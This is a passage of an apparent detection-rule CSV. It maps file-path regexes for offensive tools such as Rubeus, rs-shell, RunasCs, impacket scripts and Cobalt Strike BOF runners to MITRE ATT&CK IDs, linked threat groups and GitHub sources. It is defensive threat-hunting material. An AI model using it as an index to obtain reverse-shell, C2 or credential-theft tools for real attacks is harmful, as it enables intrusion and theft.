"*\rpcdump.py*",".{0,1000}\\rpcdump\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","18135"
"*\rpcdump.py*",".{0,1000}\\rpcdump\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18136"
"*\rpcdump.py*",".{0,1000}\\rpcdump\.py.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","18137"
"*\rpcmap.py*",".{0,1000}\\rpcmap\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18142"
"*\rpcrt.py",".{0,1000}\\rpcrt\.py","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/yuanLink/CVE-2022-26809","1","0","N/A","N/A","N/A","1","61","27","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z","18167"
"*\rpt_win.exe",".{0,1000}\\rpt_win\.exe","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","N/A","N/A","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","18174"
"*\rsocx.exe*",".{0,1000}\\rsocx\.exe.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","Dispossessor - Scattered Spider*","C2","https://github.com/b23r0/rsocx","1","0","N/A","N/A","10","10","381","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z","18180"
"*\rs-shell.exe*",".{0,1000}\\rs\-shell\.exe.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","N/A","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","18181"
"*\rs-shell-windows.exe*",".{0,1000}\\rs\-shell\-windows\.exe.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","N/A","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","18182"
"*\rt_hijacking.exe*",".{0,1000}\\rt_hijacking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","18184"
"*\Rubeus.*",".{0,1000}\\Rubeus\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","18187"
"*\Rubeus.dll*",".{0,1000}\\Rubeus\.dll.{0,1000}","offensive_tool_keyword","Rubeus","Run Rubeus via Rundll32 (potential application whitelisting bypass technique)","T1558.004 - T1098 - T1110.001 - T1555.003 - T1218.011 - T1085 - T1070.004","TA0005 - TA0002 - TA0006 - TA0008 - TA0009","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/rvrsh3ll/Rubeus-Rundll32","1","0","N/A","N/A","10","3","200","32","2020-04-25T19:55:27Z","2020-04-24T20:35:38Z","18188"
"*\Rubeus.exe*",".{0,1000}\\Rubeus\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","0","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","18189"
"*\Rubeus.exe*",".{0,1000}\\Rubeus\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18190"
"*\Rubeus.exe*",".{0,1000}\\Rubeus\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Rubeus","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18191"
"*\Rubeus.exe*",".{0,1000}\\Rubeus\.exe.{0,1000}","offensive_tool_keyword","Rubeus","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Rubeus","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18192"
"*\Rubeus.exe*",".{0,1000}\\Rubeus\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18193"
"*\Rubeus.exe*",".{0,1000}\\Rubeus\.exe.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","18194"
"*\Rubeus.ps1*",".{0,1000}\\Rubeus\.ps1.{0,1000}","offensive_tool_keyword","Rubeus","Run Rubeus via Rundll32 (potential application whitelisting bypass technique)","T1558.004 - T1098 - T1110.001 - T1555.003 - T1218.011 - T1085 - T1070.004","TA0005 - TA0002 - TA0006 - TA0008 - TA0009","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/rvrsh3ll/Rubeus-Rundll32","1","0","N/A","N/A","10","3","200","32","2020-04-25T19:55:27Z","2020-04-24T20:35:38Z","18195"
"*\rubeus.txt*",".{0,1000}\\rubeus\.txt.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","18196"
"*\Rubeus\*",".{0,1000}\\Rubeus\\.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","18197"
"*\RubeusRoast.cs*",".{0,1000}\\RubeusRoast\.cs.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","N/A","N/A","10","2","191","21","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z","18198"
"*\Rubeus-Rundll32\*",".{0,1000}\\Rubeus\-Rundll32\\.{0,1000}","offensive_tool_keyword","Rubeus","Run Rubeus via Rundll32 (potential application whitelisting bypass technique)","T1558.004 - T1098 - T1110.001 - T1555.003 - T1218.011 - T1085 - T1070.004","TA0005 - TA0002 - TA0006 - TA0008 - TA0009","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/rvrsh3ll/Rubeus-Rundll32","1","0","N/A","N/A","10","3","200","32","2020-04-25T19:55:27Z","2020-04-24T20:35:38Z","18199"
"*\ruler.exe*",".{0,1000}\\ruler\.exe.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","18200"
"*\run\john *",".{0,1000}\\run\\john\s.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","18201"
"*\run\john\*.*",".{0,1000}\\run\\john\\.{0,1000}\..{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","18202"
"*\run\john\*.com*",".{0,1000}\\run\\john\\.{0,1000}\.com.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","18203"
"*\run\john\*.pl*",".{0,1000}\\run\\john\\.{0,1000}\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","18204"
"*\run\john\*.py*",".{0,1000}\\run\\john\\.{0,1000}\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","18205"
"*\RunasCs.cs*",".{0,1000}\\RunasCs\.cs.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","18206"
"*\RunasCs.exe*",".{0,1000}\\RunasCs\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","RunasCs","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18207"
"*\RunasCs.exe*",".{0,1000}\\RunasCs\.exe.{0,1000}","offensive_tool_keyword","RunasCs","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","RunasCs","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18208"
"*\RunasCs.zip*",".{0,1000}\\RunasCs\.zip.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","18209"
"*\RunasCs_binaries.zip*",".{0,1000}\\RunasCs_binaries\.zip.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","18210"
"*\RunasCs_x86.zip*",".{0,1000}\\RunasCs_x86\.zip.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","18211"
"*\runasppl.py*",".{0,1000}\\runasppl\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","18212"
"*\RunAsWinTcb\*",".{0,1000}\\RunAsWinTcb\\.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","N/A","10","2","132","17","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z","18213"
"*\RunBOF.exe*",".{0,1000}\\RunBOF\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nettitude/RunOF","1","0","N/A","N/A","10","10","145","21","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z","18214"
"*\runcalc.dll*",".{0,1000}\\runcalc\.dll.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002  -  T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","18215"
"*\runcmd.lua*",".{0,1000}\\runcmd\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059  - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","18216"
"*\runcmd2.lua*",".{0,1000}\\runcmd2\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059  - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","18217"
"*\Running_msf_revshell*",".{0,1000}\\Running_msf_revshell.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","N/A","N/A","10","7","671","91","2025-03-12T21:58:25Z","2023-07-24T13:59:16Z","18218"
"*\RunOF.exe*",".{0,1000}\\RunOF\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nettitude/RunOF","1","0","N/A","N/A","10","10","145","21","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z","18219"
"*\RunOF\bin\*",".{0,1000}\\RunOF\\bin\\.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nettitude/RunOF","1","0","N/A","N/A","10","10","145","21","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z","18220"
"*\RunPEinMemory.exe*",".{0,1000}\\RunPEinMemory\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","18223"
"*\RunPEinMemory64.exe*",".{0,1000}\\RunPEinMemory64\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","18224"
